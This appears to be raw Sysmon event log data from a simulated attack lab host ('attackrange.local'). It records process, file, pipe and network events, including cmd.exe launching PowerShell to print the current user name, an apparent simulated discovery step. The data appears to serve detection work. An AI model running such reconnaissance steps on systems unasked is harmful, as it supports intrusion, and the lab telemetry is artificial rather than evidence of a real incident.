23542300x800000000000000036498177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:58.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAD93F94849C6B6496CA23133AA89204,SHA256=88D349D5BDF38B6093B377FA2DA0BEE6DB6E31C2DA233B5CFAB6B78AA94B32EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:58.356{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDD12CA0CCEB4066F145D9EAE48C50E,SHA256=44757D1D5A2371E9BE4FFCC7E10251489B888258397B81EDD2FE9EE18469A71C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:59.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F0739F28B777788FEAD16917A2E080,SHA256=61A07341F5D0323A3E7A214E59D46C8FCCCF42073AFC31402DFED284949F930D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:00.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D6FBA1514A6B6BE4060489430AEEBB,SHA256=9326F3AF24F3E42C52CF1C370EF8E2BA42AE5479FCC4BE14A3D392C3B29D8AB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.229{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50621-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:01.418{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B4A622A592658D43352E26DC233ABB4,SHA256=A5CB8246B9066E7F45ECDE1EAD47963AB154966AC0F73BE6479D73231247ACDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.726{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50622-false10.0.1.12-8000- 23542300x800000000000000036498208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.831{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.786{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.786{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.739{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.739{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000036498203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:21:02.702{B81B27B7-A1BE-6140-A256-04000000C801}6224\PSHost.132760992625876637.6224.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.670{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_hc4amxxp.ap4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.670{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ylwlspwx.d1a.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.655{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ylwlspwx.d1a.ps12021-09-14 13:21:02.655 10341000x800000000000000036498199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.623{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-A1BE-6140-A156-04000000C801}62847088C:\Windows\system32\cmd.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.587{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe [System.Environment]::UserNameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe [System.Environment]::UserName 10341000x800000000000000036498190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.579{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe 